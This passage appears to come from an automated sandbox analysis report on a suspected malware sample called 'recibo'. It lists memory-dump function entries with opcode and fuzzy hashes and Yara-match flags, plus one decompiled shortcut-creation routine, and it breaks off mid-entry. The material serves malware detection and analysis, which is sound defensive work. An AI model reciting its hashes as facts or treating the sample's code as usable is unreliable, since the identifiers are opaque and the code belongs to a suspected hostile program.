                                                                                  • Opcode Fuzzy Hash: 685d25d49b7775c36d338f7e14e4763d44e62cb7a3cecac7a6d322f6e360c960
                                                                                  • Instruction Fuzzy Hash: E2E1AD42E3E30699EB933032C1667E75745CF271C6E218B5ACC2AB1966771F0E8EC9C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0514 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: a419351939acf18299c8bfe398fe47c0574d3f3b1b810b97cd9edd10db039f40
                                                                                  • Instruction ID: c119451ac745014f103b912482cbe7bd3fc1803927ddd17816c76aa5b8048cd2
                                                                                  • Opcode Fuzzy Hash: a419351939acf18299c8bfe398fe47c0574d3f3b1b810b97cd9edd10db039f40
                                                                                  • Instruction Fuzzy Hash: 7CE1BE42E3E30599EB933032C1657E75745CF271C6E218B5ACC2AB1966771F0E8EC9C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB06E2 Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: fbe9177192f642a4b7df91a4198dd96f77bb736e698528f12b4ac076b4118e39
                                                                                  • Instruction ID: a89e8f3e45e90c20524944a909ced53fa42d34b083336c5b263bc0ee8cf594ba
                                                                                  • Opcode Fuzzy Hash: fbe9177192f642a4b7df91a4198dd96f77bb736e698528f12b4ac076b4118e39
                                                                                  • Instruction Fuzzy Hash: 55D1C142E3E30699EB933073C1653E75745CF271C6D218B5ACC2AB2866771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB08BB Relevance: 1.7, Strings: 1, Instructions: 498COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: e06878da6993f2fe6d02dc18aef04d2bf5e2f3d487856fa773bb92425814068a
                                                                                  • Instruction ID: af4664a2f5374e85b0a5c3817646b947d471405d5365deb7ae908ff254fb7b18
                                                                                  • Opcode Fuzzy Hash: e06878da6993f2fe6d02dc18aef04d2bf5e2f3d487856fa773bb92425814068a
                                                                                  • Instruction Fuzzy Hash: 03C1E146E3E30699EB93303381663E75745CF272C6E618B5BCC2A72866771B0E4EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0795 Relevance: 1.7, Strings: 1, Instructions: 497COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 0b95d783450a1f3310b0c82aaa5d628943c31f39644cb50abf9db9f304ecc157
                                                                                  • Instruction ID: 791b4391c7ece2a6b449922346187317c08bed8b20717281a31729c4e38657a5
                                                                                  • Opcode Fuzzy Hash: 0b95d783450a1f3310b0c82aaa5d628943c31f39644cb50abf9db9f304ecc157
                                                                                  • Instruction Fuzzy Hash: D0C1CF46E3E30699EB93303281663E75745CF271C6E618B5ACC2A72866771F0E8EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0761 Relevance: 1.7, Strings: 1, Instructions: 497COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: e94cf14f889529d4668e828ec4774c098f13d3f4e97c1cd58ebdb5020b19af72
                                                                                  • Instruction ID: 196071782e1cfe75ff5f1063cf9a45a2f981c0934cf733ec97d1b956c47beef2
                                                                                  • Opcode Fuzzy Hash: e94cf14f889529d4668e828ec4774c098f13d3f4e97c1cd58ebdb5020b19af72
                                                                                  • Instruction Fuzzy Hash: E0D1D142E3E30699EB93303381657E75745CF271C5E618B5ACC2A72865771F0E8EC9C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB07C2 Relevance: 1.7, Strings: 1, Instructions: 485COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: d55a59d29f1903248987c2f1b4baa72f32c2d31eecaa00dc1b8ba924c7ab2c84
                                                                                  • Instruction ID: 606016da300f63207396cd41a8bc36e326805b611f5ac61b44ae540fb256b920
                                                                                  • Opcode Fuzzy Hash: d55a59d29f1903248987c2f1b4baa72f32c2d31eecaa00dc1b8ba924c7ab2c84
                                                                                  • Instruction Fuzzy Hash: B2C1D146E3E30699EB93303281663E75745CF271C6D618B5ACC2A72865771F0E8EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0805 Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: bbeb62ec10ed9e294d05ea4b5ec851233e58fa180a1a83ebd925ad88310a01f5
                                                                                  • Instruction ID: d9bf69d9d1a6052edd369e6082d8050487af429143956ac1a729801f71980a14
                                                                                  • Opcode Fuzzy Hash: bbeb62ec10ed9e294d05ea4b5ec851233e58fa180a1a83ebd925ad88310a01f5
                                                                                  • Instruction Fuzzy Hash: 82C1E046E3E30698EB83303381663EB5345CF271D5E618B5ACC3B728A5771B0A8E85C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0844 Relevance: 1.7, Strings: 1, Instructions: 470COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: c19f3c083671e60951693919bdc3b3c5cecccb9510ebc85669dd80f6099b8c7f
                                                                                  • Instruction ID: 0143369b46bff758275aedb8699ac11393640ad416ee81302d3590681a487fef
                                                                                  • Opcode Fuzzy Hash: c19f3c083671e60951693919bdc3b3c5cecccb9510ebc85669dd80f6099b8c7f
                                                                                  • Instruction Fuzzy Hash: ABC1E146E3E30699EB93303381663E75745CF272C5E618B5BCC2A72866771F0A8EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0A2E Relevance: 1.7, Strings: 1, Instructions: 456COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: c08af287e4f792a12e992afe31b5bf7596e3cab53ba07a708b0951106d49c75e
                                                                                  • Instruction ID: faf48cd1f317490c2453506b18266f077943fbb829be1171331e8f90ae2fc9e8
                                                                                  • Opcode Fuzzy Hash: c08af287e4f792a12e992afe31b5bf7596e3cab53ba07a708b0951106d49c75e
                                                                                  • Instruction Fuzzy Hash: 05B1E146E3E30698EB93303281A57E75345CF171C2E268B5ACC2AB2865771F0A8E85C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB09B7 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: b844b98049cf71cc9c967c2148bc2f947f2ee12df0254cd346659eb51f45fbbc
                                                                                  • Instruction ID: 3c1be0f5835ec7387de6ecdd4417cd95dc1c9dd174f38b6efc57bee184d2e6d3
                                                                                  • Opcode Fuzzy Hash: b844b98049cf71cc9c967c2148bc2f947f2ee12df0254cd346659eb51f45fbbc
                                                                                  • Instruction Fuzzy Hash: C1B1E246E3E30698EB933032C1657E75745CF171C6E628B5ACC2BB28A5771F0A8EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB094F Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: d2907657c032eafd08dfae4a980304c3ed3bdb8b09c3dbb6dcbda51ce85a92d5
                                                                                  • Instruction ID: d3c7316013face30bd6e5ba2c852d8ce8540d3857be9a0033680108bcacc1bb8
                                                                                  • Opcode Fuzzy Hash: d2907657c032eafd08dfae4a980304c3ed3bdb8b09c3dbb6dcbda51ce85a92d5
                                                                                  • Instruction Fuzzy Hash: 46B1E246E3E30699EB933033C1A57E75745CF172C6E218B5ACC2A72866B71F0A4EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0ABE Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: d93508c162d3fbf7b7784eece09cf6b8f38719cdb7379c92bf8788fab46bd9ca
                                                                                  • Instruction ID: e88f20180e7561f069c90e332d5541d42a347822267a0b6eb109632805dbb93a
                                                                                  • Opcode Fuzzy Hash: d93508c162d3fbf7b7784eece09cf6b8f38719cdb7379c92bf8788fab46bd9ca
                                                                                  • Instruction Fuzzy Hash: ACB1E146E3E30698EB933032C1657E75785CF171C2D668B5BCC2BB2866771B0A8E85C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0B34 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 6ef1e0d6bbfe0b34ef67e7999739cd96bf09e1d7f21a4508e2309c4deea004fe
                                                                                  • Instruction ID: 90c9d60115dba2ad533524db92120d7edfaf275f37c59a3bd63bcb366ab722f6
                                                                                  • Opcode Fuzzy Hash: 6ef1e0d6bbfe0b34ef67e7999739cd96bf09e1d7f21a4508e2309c4deea004fe
                                                                                  • Instruction Fuzzy Hash: 78A1F546E3E30598EB933076C1B53E75745CF231C2E66876BCC6B72865771B0A8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0AF4 Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: b56f158d0ee05c04d6c14a21fcae56419a2c35d1232e30fa5137cac455b3bc27
                                                                                  • Instruction ID: 23df29ae092ed85a713a681953b7d32b36c11dd184078b8691af2cf21af26c90
                                                                                  • Opcode Fuzzy Hash: b56f158d0ee05c04d6c14a21fcae56419a2c35d1232e30fa5137cac455b3bc27
                                                                                  • Instruction Fuzzy Hash: 0FA1E146E3E30698DB93307281B57E75785CF131C2D668B5BCC6BB2C65771B0A8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB2931 Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: zUf=
                                                                                  • API String ID: 0-612299663
                                                                                  • Opcode ID: 80d33be927dcd3eb9e1b831c1e8306e83bee3e51fb051bc69d32c6cd00577d81
                                                                                  • Instruction ID: 0397a75b25bceb3c5eb6f5e5ae076b54f6bb413db14ad650c9fd7e7ccb4668eb
                                                                                  • Opcode Fuzzy Hash: 80d33be927dcd3eb9e1b831c1e8306e83bee3e51fb051bc69d32c6cd00577d81
                                                                                  • Instruction Fuzzy Hash: F9D111395543864BC72B8E34C8693D67FE2EF4A324F2C195ACD858B66AC623C543CB53
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0BB7 Relevance: 1.6, Strings: 1, Instructions: 398COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 362570953670414de54da52e3952c335ee6e6d58b37b8c083e923efe49e02f05
                                                                                  • Instruction ID: 4a9df370b4b052d6fb4668db092bf75cd93ca58e17492c84ab5cfa96d9ea647f
                                                                                  • Opcode Fuzzy Hash: 362570953670414de54da52e3952c335ee6e6d58b37b8c083e923efe49e02f05
                                                                                  • Instruction Fuzzy Hash: 4EA1E346E3E30698EB933032C1753E75345CF131C2D26875BCC5B72865771B0A8E85C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0A9F Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: c2ad9f1e84c6a3b003f5e319bafb9bde6830fe9fc64132f263c2b09b25602299
                                                                                  • Instruction ID: e0262f9af0233389fabe4210d04c2edb9ad8a0ff1d21b3ad86f3b1aaf32f7e77
                                                                                  • Opcode Fuzzy Hash: c2ad9f1e84c6a3b003f5e319bafb9bde6830fe9fc64132f263c2b09b25602299
                                                                                  • Instruction Fuzzy Hash: F7A1E046E3E30698DB933032C1B57E75785CF171C2E668B5ACC2BB2865771B0A8E85C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0BEE Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 01a267f56e8ff530913ecb378b0f4559d05ef52cef084c5a900b3c06572af32e
                                                                                  • Instruction ID: 0c38b9e729143cbe8e091419e0b05c5531973d9f9885f40d7a1215042e3bcb8a
                                                                                  • Opcode Fuzzy Hash: 01a267f56e8ff530913ecb378b0f4559d05ef52cef084c5a900b3c06572af32e
                                                                                  • Instruction Fuzzy Hash: 8C91E346E3E30598EB933076C1B53E75345CF131C2D668B5BCC6BB28A5771B0A8E85C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 67%
                                                                                  			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                  0x004021b3
                                                                                  0x004021bd
                                                                                  0x004021c7
                                                                                  0x004021d1
                                                                                  0x004021dc
                                                                                  0x004021df
                                                                                  0x004021f9
                                                                                  0x004021fc
                                                                                  0x00402202
                                                                                  0x00402205
                                                                                  0x0040220f
                                                                                  0x00402213
                                                                                  0x00402213
                                                                                  0x00402218
                                                                                  0x00402229
                                                                                  0x00402231
                                                                                  0x004022e8
                                                                                  0x004022e8
                                                                                  0x004022ef
                                                                                  0x00402237
                                                                                  0x00402237
                                                                                  0x00402246
                                                                                  0x0040224a
                                                                                  0x0040224d
                                                                                  0x00402253
                                                                                  0x00402261
                                                                                  0x00402264
                                                                                  0x00402266
                                                                                  0x00402271
                                                                                  0x00402271
                                                                                  0x00402276
                                                                                  0x00402278
                                                                                  0x0040227f
                                                                                  0x0040227f
                                                                                  0x00402282
                                                                                  0x0040228b
                                                                                  0x0040228e
                                                                                  0x00402294
                                                                                  0x00402296
                                                                                  0x004022a0
                                                                                  0x004022a0
                                                                                  0x004022a3
                                                                                  0x004022ac
                                                                                  0x004022af
                                                                                  0x004022b8
                                                                                  0x004022be
                                                                                  0x004022c0
                                                                                  0x004022ce
                                                                                  0x004022ce
                                                                                  0x004022d1
                                                                                  0x004022d7
                                                                                  0x004022d7
                                                                                  0x004022da
                                                                                  0x004022e0
                                                                                  0x004022e6
                                                                                  0x004022fb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004022e6
                                                                                  0x004022f1
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID:
                                                                                  • API String ID: 542301482-0
                                                                                  • Opcode ID: f0c7f0c58da5b2556a219b4126ec8a5e6c03aa9de5f34d462473648d541e39b0
                                                                                  • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                  • Opcode Fuzzy Hash: f0c7f0c58da5b2556a219b4126ec8a5e6c03aa9de5f34d462473648d541e39b0
                                                                                  • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CBBC2D Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: vq
                                                                                  • API String ID: 0-385929040
                                                                                  • Opcode ID: e758ae799d527833c53ce799999ca19a2c2a53c455f4646af13228a54bbb589d
                                                                                  • Instruction ID: 40eddd27dd1a751f77d297808aa35ecc647bab7d25b7f3cd0e2ec9c698eee96d
                                                                                  • Opcode Fuzzy Hash: e758ae799d527833c53ce799999ca19a2c2a53c455f4646af13228a54bbb589d
                                                                                  • Instruction Fuzzy Hash: 26D145716043068FDB359E29C9A53DA73B3EFA6350FA5816ECC8A8B605D7314A87CB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0C9E Relevance: 1.6, Strings: 1, Instructions: 365COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
